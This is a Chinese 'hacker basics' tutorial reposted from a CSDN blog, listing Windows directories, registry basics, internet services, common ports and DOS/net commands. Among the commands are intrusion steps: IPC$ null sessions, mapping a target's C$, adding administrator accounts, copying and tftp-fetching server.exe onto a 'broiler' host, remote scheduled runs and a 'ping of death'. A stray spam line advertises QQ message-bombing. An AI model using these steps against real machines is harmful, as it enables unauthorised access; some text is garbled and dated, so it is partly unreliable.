Window基础(黑客基础)

指导 09-07 阅读: 评论:
后台-系统设置-扩展变量-手机广告位-内容正文顶部

 

一、Window重要目录

1.ProgramData:C:\ProgramData 是个公用的被创建文件夹或文件存放的地方,这些文件夹或文件仅由创建者完整控制。programdata是电脑C盘的一个系统文件夹

2.Program Files和Program Files(86):程序软件默认安装目录,它们的区别是前者是安装64位软件,后者是安装32位软件

3.Window:系统安装目录

4.C:Windows\System32\config\ SAM:存储系统用户名和密码

5.C:Windows\System32\drivers\etc\hosts:   host是一个没有扩展名的系统文件,可以用记事本等工具打开,其作用就是将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”,当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从hosts文件中寻找对应的IP地址,一旦找到,系统会立即打开对应网页,如果没有找到,则系统再会将网址提交DNS域名解析服务器进行IP地址的解析

二、注册表

1、简介:注册表(Registry,繁体中文版Windows操作系统称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息。

2.作用:注册表是windows操作系统中的一个核心数据库,其中存放着各种参数,直接控制着windows的启动、硬件驱动程序的装载以及一些windows应用程序的运行,从而在整个系统中起着核心作用。这些作用包括了软、硬件的相关配置和状态信息,比如注册表中保存有应用程序和资源管理器外壳的初始条件、首选项和卸载数据等,联网计算机的整个系统的设置和各种许可,文件扩展名与应用程序的关联,硬件部件的描述、状态和属性,性能记录和其他底层的系统状态信息,以及其他数据等。

三、计算机服务名称

1.万维网(WWW)

万维网(World Wide Web,简称WWW)是瑞士日内瓦欧洲粒子实验室最先开发的一个分布式超媒体信息查询系统,目前它是因特网上最为先进、交互性能最好、应用最为广泛的信息检索工具,万维网包括各种各样的信息,如:文本、声音、图像、视频等。万维网采用了"超文本"的技术,使得用户以通用而简单的办法就可获得因特网上的各种信息。

2.电子邮件(E-mail)

电子邮件(Electronic mail,简写为E-mail)是因特网上使用最广泛的一种服务。用户只要能与因特网连接,具有能收发电子邮件程序及个人的电子邮件地址,就可以与因特网上具有电子邮件地址的所有用户方便、快捷、经济地交换电子邮件。电子邮件可以在两个用户间交换,也可以向多个用户发送同一封邮件,或将收到的邮件转发给其它用户。电子邮件中除文本外,还可包含声音、图像、应用程序等各类计算机文件。此外,用户还可以以邮件方式在网上订阅电子杂志、获取所需文件、参与有关的公告和讨论组等。

3.文本传输协议(FTP)

文本传输协议(File Transfer Protocol,简称FTP)是因特网上文件传输的基础,通常所说的FTP是基于该协议的一种服务。FTP文本传输服务允许因特网上的用户将一台计算机上的文件传输到另一台上,几乎所有类型的文件,包括文本文件、二进制可执行文件、声音文件、图像文件、数据压缩文件等,都可以用FTP传送。

FTP实际上是一套文件服务软件,它以文件传输为界面,使用简单的get和put命令就可以进行文件的下载和上传,如同在因特网上执行文件复制命令一样。大多数FTP服务器主机都采用UNIX操作系统,但普通用户通过Windows98和Windows XP也能方便地使用FTP和UNIX主机进行文件的传输。

FTP最大的特点是用户可以使用因特网上众多的匿名FTP服务器。所谓匿名服务器,指的是不需要专门的用户名和口令就可以进入的系统。用户连接匿名服务器时,都可以用"Anonymous"(匿名)作为用户名、以自己的电子邮件地址作为口令登录。登录成功后,用户便可从匿名服务器上下载文件。匿名服务器的标准目录为pub,用户通常可以访问该目录下所有子目录中的文件。考虑到安全问题,大多数匿名服务器不允许用户上传文件。

4.远程登录(Telnet)

Telnet是远程登录服务的一个协议,该协议定义了远程登录用户与服务器交互的方式。允许用户在一台联网的计算机登录到一个远程分时系统时,然后像使用自己的计算机一样使用该远程系统。

要使用远程登录服务,必须在本地计算机上启动一个客户应用程序,指定远程计算机的名字,并通过因特网与之建立连接。一旦连接成功,本地计算机就像通常的终端一样,直接访问远程计算机系统的资源。远程登软件允许用户直接与远程计算机交互,通过键盘或鼠标操作,客户应用程序将有关的信息发送给远程计算机,再由远程计算机将输出结果返回给用户。用户退出远程登录后,用户的键盘、显示控制权又回到本地计算机。一般用户可通过Windows XP的Telnet客房程序进行远程登录。

5.专题讨论(Usenet)

Usenet是一个有众多趣味相投的用户共同组织起来的各种专题讨论组的集合。通常也将之称为全球性的电子公告板系统(BBS)。Usenet用于发布公告、新闻、评论及各种文章供网上用户使用和讨论。讨论内容按不同的专题分类组织,每一类为一个专题组,称为新闻组,其内部还可以分出更多的子专题。

Usenet的每一个新闻组都由一个区分类型的标记引导,每个新闻组围绕一个主题,如comp.(计算机方面的内容)、news.(Usenet本身的新闻与消息)、rec.(体育、艺术及娱乐活动)、sci.(科学技术)、soc.(社会问题)、talk.(讨论交流)、misc.(其它杂项话题)、biz.(商业方面问题)等。

用户除了可以选择参加感兴趣的专题小组外,也可以自己开设新的专题组。只要有人参加该专题组就可以一直存在下去;若一段时间无人参加,则这个专题组会被自动删除。

6.Internet闲谈

Internet闲谈就是我们熟悉的IRC,即Internet Relay Chat。如果说电子邮件、网络新闻是因特网上的存储转发的通信业务,即可以使接收者在适当的时候看到的话,那么,IRC就是因特网上的一个实时通信业务,它可以使接收者和发送者都处于联机状态,使他们直接在因特网上进行交谈。可以利用这种方式召开网上会议,使网络上的相关用户可以直接实时地就某些问题进行讨论,并提出解决方案。目前国内较著名的中文聊天软件有藤讯公司的OICQ等

四、常用端口

21端口:21端口主要用于ftp(file transfer protocol,文件传输协议)服务。

23端口:23端口主要用于telnet(远程登录)服务,是internet上普遍采用的登录和仿真程序。

25端口:25端口为smtp(simple mail transfer protocol,简单邮件传输协议)服务器所开放,主要用于发送邮件,如今绝大多数邮件服务器都使用该协议。

53端口:53端口为dns(domain name server,域名服务器)服务器所开放,主要用于域名解析,dns服务在nt系统中使用的最为广泛。

67、68端口:67、68端口分别是为bootp服务的bootstrap protocol server(引导程序协议服务端)和bootstrap protocol client(引导程序协议客户端)开放的端口。

69端口:tftp是cisco公司开发的一个简单文件传输协议,类似于ftp。 79端口:79端口是为finger服务开放的,主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。

80端口:80端口是为http(hypertext transport protocol,超文本传输协议)开放的,这是上网冲浪使用最多的协议,主要用于在www(world wide web,万维网)服务上传输信息的协议。

99端口:99端口是用于一个名为“metagram relay”(亚对策延时)的服务,该服务比较少见,一般是用不到的。

109、110端口:109端口是为pop2(post office protocol version 2,邮局协议2)服务开放的,110端口是为pop3(邮件协议3)服务开放的,pop2、pop3都是主要用于接收邮件的。

111端口:111端口是sun公司的rpc(remote procedure call,远程过程调用)服务所开放的端口,主要用于分布式系统中不同计算机的内部进程通信,rpc在多种网络服务中都是很重要的组件。

113端口:113端口主要用于windows的“authentication service”(验证服务)。

119端口:119端口是为“network news transfer protocol”(网络新闻组传输协议,简称nntp)开放的。

135端口:135端口主要用于使用rpc(remote procedure call,远程过程调用)协议并提供dcom(分布式组件对象模型)服务。

137端口:137端口主要用于“netbios name service”(netbios名称服务)。

139端口:139端口是为“netbios session service”提供的,主要用于提供windows文件和打印机共享以及unix中的samba服务。

143端口:143端口主要是用于“internet message access protocol”v2(internet消息访问协议,简称imap)。

161端口:161端口是用于“simple network management protocol”(简单网络管理协议,简称snmp)。

443端口:43端口即网页浏览端口,主要是用于https服务,是提供加密和通过安全端口传输的另一种http。

554端口:554端口默认情况下用于“real time streaming protocol”(实时流协议,简称rtsp)。

1024端口:1024端口一般不固定分配给某个服务,在英文中的解释是“reserved”(保留)。

1080端口:1080端口是socks代理服务使用的端口,大家平时上网使用的www服务使用的是http协议的代理服务。

1755端口:1755端口默认情况下用于“microsoft media server”(微软媒体服务器,简称mms)。

4000端口:4000端口是用于大家经常使用的 聊天工具的,再细说就是为 客户端开放的端口, 服务端使用的端口是8000。

5554端口:在今年4月30日就报道出现了一种针对微软lsass服务的新蠕虫病毒——震荡波(worm.sasser),该病毒可以利用tcp 5554端口开启一个ftp服务,主要被用于病毒的传播。

5632端口:5632端口是被大家所熟悉的远程控制软件pcanywhere所开启的端口。

8080端口:8080端口同80端口,是被用于www代理服务的,可以实现网页端口概念 在网络技术中,端口(port)大致有两种意思:一是物理意义上的端口,比如,adsl modem、集线器、交换机、路由器用于连接其他网络设备的接口,如rj-45端口、sc端口等等。二是逻辑意义上的端口,一般是指tcp/ip协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于ftp服务的21端口等等。 们这里将要介绍的就是逻辑意义上的端口。

3306端口:mysql

1433端口:sqlserver

1521端口:oracle

3389: 远程桌面

五、常用DOS命令

dir (directory) :列出当前目录下的文件以及文件夹

md (make directory): 创建目录

rd (remove directory):删除目录

cd (change directory):进入指定目录

cd.. : 退回到上一级目录

cd\ : 退回到根目录

del:删除文件

exit:退出dos命令行

cls (clear screen): 清屏

net use ipipc$ " " /user:" " 建立IPC空链接

net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

net use h: ipc$ 登陆后映射对方C:到本地为H:

net use ipipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time 目标ip 查看对方时间

net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。

例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

如何qq轰炸别人手机 如何qq多次发送消息 教你如何用记事本创建一个微信 QQ轰炸器 通信软件通用!

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:

xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送

tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件(目录)的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性

dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序,并显示出:请按任意键继续....

if 在批处理程序中执行条件处理(更多说明见if命令及变量)

goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)

call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)

for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)

echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件. 

————————————————

版权声明:本文为CSDN博主「Odysseus-lpy」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。

原文链接:https://blog.csdn.net/weixin_43460822/article/details/95050966

后台-系统设置-扩展变量-手机广告位-内容正文底部
版权声明

本文仅代表作者观点,不代表Flashempire闪客帝国立场。
本文系作者授权Flashempire闪客帝国发表,未经许可,不得转载。

分享:

扫一扫二维码

扫一扫在手机阅读、分享本文

评论

留言与评论(共有 0 条评论)
   
验证码:

相关推荐